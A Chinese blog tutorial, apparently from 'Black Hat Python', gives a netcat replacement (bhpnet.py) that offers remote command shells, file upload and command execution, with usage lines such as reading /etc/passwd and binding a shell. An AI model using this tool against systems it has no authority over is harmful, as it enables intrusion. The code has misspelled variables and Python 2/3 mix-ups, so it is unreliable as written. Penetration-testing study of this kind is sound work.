前言

众所周知,netcat是网络界的瑞士军刀,它的主要作用是:提供连接其他终端的方法,可以上传文件,反弹shell等等各种利于别人控制你电脑的操作。所以聪明的系统管理员会将它从系统中移除,这样当别人渗透进入你的系统,也没有现成的连接工具给他们用。

代码实现

import sys

import socket

import getopt

import threading

import subprocess

#定义一些全局变量

listen              = False

command             = False

upload              = False

execute             = ""

target              = ""

upload_destination  = ""

port                = 0

def usage():

    print("BHP Net Tool")

    print()

    print("Usage: bhpnet.py -t target_host -p port")

    print("-l --listen              - listen on [host]:[port] for incoming cennections")

    print("-e --execute=file_to_run - execute the given file upon receiving a connection ")

    print("-c --command             - initialize a command shell")

    print("-u --upload=destination  - upon receiving connection upload a file and write to [destinction]")

    print()

    print()

    print("Examples: ")

    print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c")

    print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=C:\\target.exe")

    print("bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"")

    print("echo 'ABCDEFGHIJK' | ./bhpnet.py -t 192.168.0.1 -p 8888")

    sys.exit(0)

def main():

    global listen

    global port

    global execute

    global command

    global upload_destincation

    global target

    if not len(sys.argv[1:]):

        usage()

    try:

        opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen"

                                ,"execute","tarhet", "port", "command", "upload"])

    except getopt.GetoptError as err:

        print(str(err))

        usage()

    for o,a in opts:

        if o in ("-h", "--help"):

            usage()

        elif o in ("-l", "--listen"):

            listen = True

        elif o in ("-e", "--execute"):

            execute = a

        elif o in ("-c", "--commandshell"):

            command = True

        elif o in ("-u", "--upload"):

            upload_destinction = a

        elif o in ("-t", "--target"):

            target = a

        elif o in ("-p", "--port"):

            port = int(a)

        else:

            assert False,"Unhandle Option"

    #判断我们是在监听还是仅仅从标准输入发送数据

    #listen为False,len(target)大于0,port > 0 三个条件同时成立,则证明:

    #是从标准输入读取数据,即:从标准输入读取数据,发送到监听端(服务端)。

    #这里的标准输入可以来自键盘输入,亦可以来自文件重定向。

    if not listen and len(target) and port > 0:

        #从命令行(标准输入)读取数据

        #这里将阻塞,所以在不想向标准输入发送数据时:要发送CTRL-D

        buffer = sys.stdin.read()

        # 将标准输入的数据发送到监听端

        client_sender(buffer)

    #如果上面的if语句没被执行,那么就说明这个程序是作为监听端了。

    #我们开始监听并准备上传文件,执行命令

    #放置一个反弹shell

    #具体操作取决于你用的命令行选项

    if listen:

        server_loop()

def client_sender(buffer):

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:

        #连接到目标主机

        client.connect((target, port))

        if len(buffer):

            client.send(buffer)

        while(True):

            #现在等待数据回传

            recv_len = 1

            response = ""

            while recv_len:

                data = client.recv(4096)

                recv_len = len(data)

                response += data

                if recv_len < 4096:

                    break

            print(response,)

            #等待更多输入

            buffer = raw_input("")

            buffer += "\n"

            #发送出去

            client.send(buffer)

    except:

        print("[*] Exception! Exiting")

    client.close()

def server_loop():

    global target

    #如果没有定义目标,则监控所有端口

    if not len(target):

        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    server.bind((target,port))

    server.listen(5)

    while(True):

        client_socket, addr = server.accept()

        #分拆一个线程处理新的客户端

        client_thread = threading.Thread(target=client_handler, args = (client_socket,))

        client.start()

def run_command(command):

    command = command.rstrip()

    try:

        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)

    except:

        output = "Falied to execute command.\r\n"

    return output

def client_handler(client_socket):

    global upload

    global execute

    global command

    if len(upload_destination):

        #读取所有的字符并写入目标

        # (目标是一个文件,文件名跟在-u后面,这个操作就是将客户端传过来的数据写进文件里)

        file_buffer = ""

        while True:

            data = client_socket.recv(1024)

            if not data:

                break

            else:

                file_buffer += data

        #现在将接受到的数据file_buffer写进文件里

        try:

            file_descriptor = open(upload_destinction, "wb")

            file_descriptor.write(file_buffer)

            file_descriptor.close()

            #向另一端(即客户端)发送确认报文,确认文件已成功接收

            client_socket.send("Successful saved file to %s\r\n" % upload_destinction)

        except:

            client_socket.send("Failed to save file to %s\r\n" % upload_destinction)

        #检查命令执行

        if len(execute):

            output = run_command(execute)

            client_socket.send(output)

        #如果需要一个命令行shell,那么我们进入另一个循环

        if command:

            while True:

                #跳出一个窗口

                client_socket.send("<BHP: #> ")

                #现在我们接受文件直至发现换行符(即当你输入完命令后会按回车)

                cmd_buffer = ""

                while "\n" not in cmd_buffer:

                    cmd_buffer += client_socket.recv(1024)

                #执行命令,并且将命令的输出结果保存在response里

                response = run_command(cmd_buffer)

                # 返回相应数据

                client_socket.send(response)

if __name__ == "__main__":

    main()

注意,我这个代码是python3的,如果想看python2的,看这位大神的博客

输出

  1. 将bhpnet.py作为客户端,连接百度:echo -ne "GET / HTTP/1.1\r\nHost:www.baidu.com\r\n\r\n" | ./bhpnet.py -t www.baidu.com -p 80

  2. 反弹一个shell(这里有-l参数的命令行是作为监听端,即服务端。没-l参数的作为客户端)。监听端命令:./bhpnet.py -p 5555 -c -l 客户端命令:./bhpnet.py -t 127.0.0.1 -p 5555

  3. 上传文件

小总结

或许经历了前面TCP服务端与TCP客户端分离的形式,你会分不清什么时候bhpnet.py作为服务端,什么时候作为客户端。这里可以简单认为:有-l参数的就是服务端。因为只有服务端会监听端口。

取代netcat的更多相关文章

  1. python渗透测试入门——取代netcat

    1.代码及代码讲解. 实验环境:windows10下的linux子系统+kali虚拟机 import argparse import socket import shlex import subpro ...

  2. socket | netcat 模拟

    #!/opt/local/bin/python2.7 #coding=utf-8 ''' 取代netcat 两台主机中其中一台控制另一台 得到北控方的shell ''' import sys impo ...

  3. python黑帽子

    1.TCP客户端 #AF_INET 使用标准的IPv4地址或者主机名 #SOCK_STREAM是一个客户端 import socket target_host = 'www.google.com' t ...

  4. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

  5. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  6. [转]NetCat简介

    NetCat是一个非常简单的Unix工具,可以读.写TCP或UDP网络连接(network connection).它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易 ...

  7. 取代SharedPreferences的多进程解决方案

    Android的SharedPreferences用来存储一些键值对, 但是却不支持跨进程使用. 跨进程来用的话, 当然是放在数据库更可靠啦, 本文主要是给作者的新库PreferencesProvid ...

  8. 让代码重构渐行渐远系列(3)——string.Equals取代直接比较与非比较

    重构背景及原因 最近由于项目组的人员在不断扩充,导致项目中代码风格各异,大有百花齐放甚至怒放之势.考虑到团队的生存与发展,经过众人多次舌战之后,最终决定项目组根据业务分成几个小分队,以加强团队管理与提 ...

  9. 第1章 重构,第一个案例(3):运用多态取代switch

    3. 运用多态取代与价格相关的条件逻辑 3.1 switch和“常客积分”代码的再次搬迁 (1)switch:最好不要在另一个对象的属性上运用switch语句 switch(getMovie().ge ...

随机推荐

  1. 使用Vagrant打造开发环境

    1.安装Oracle VM VirtualBox.vagrant,安装完成需重启电脑 Oracle VM VirtualBox安装包下载:https://www.virtualbox.org/wiki ...

  2. 分享一个低配VPS下运行的mysql配置文件

    在各种内存CPU核心只有1/2核,内存只有512M/1G的vps下,内存.CPU.硬盘都不是太充裕.因此主要思路是,禁止吃内存大户innodb引擎,默认使用MyISAM.禁止吃硬盘大户log-bin, ...

  3. 使用HttpClient进行Get方式通信

    下载apache包 http://hc.apache.org/downloads.cgi 比较eclipse自带api,简单,易上手 实例: package zw1; import java.io.I ...

  4. oracle实现like多关键字查询

    oracle实现like多关键字查询: select * from contract_info tt where 1=1 and REGEXP_LIKE(tt.contract_name,'关键字1| ...

  5. 如何禁止火狐onblur时alert()产生类似选中的拖蓝效果

    输入框中onblur 然后alert();会产生 复制 选中的效果的效果( 拖蓝) onblur="aa()"function aa(){ alert("--" ...

  6. ENetwork Basic Configuration PT Practice SBA

    CCNA Exploration: 网络基础知识 (版本 4.0) A few things to keep in mind while completing this activity: 1 Do  ...

  7. linux命令之crontab定时执行任务

    一.crond简介 crond 是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,与windows下的计划任务类似,当安装完成操作系统后,默认会安装此服务 工具,并且会自动启动c ...

  8. java复习(9)---数据库JDBC

    java写工程当然需要连接数据库.JDBC技术是连接数据库和应用程序的纽带,本节主要说明如何连接数据库. java中提供sql类. package re09; import java.sql.*; p ...

  9. HTML5常用标签总结

    一.常用的标签 <h1>~<h6> 表示是一个标题 <p> 段落标签 <hr/> 水平线标签 <br/> 换行标签 <sub> ...

  10. Java设计模式———静态工厂

    上课时yqj2065要求:除了JDK等框架或工具中的类,自己编写的类不得使用new创建对象(Test除外). 据说是因为使用new会涉及到硬编码.(不是很懂) 所以要求用God类利用反射+配置文件来创 ...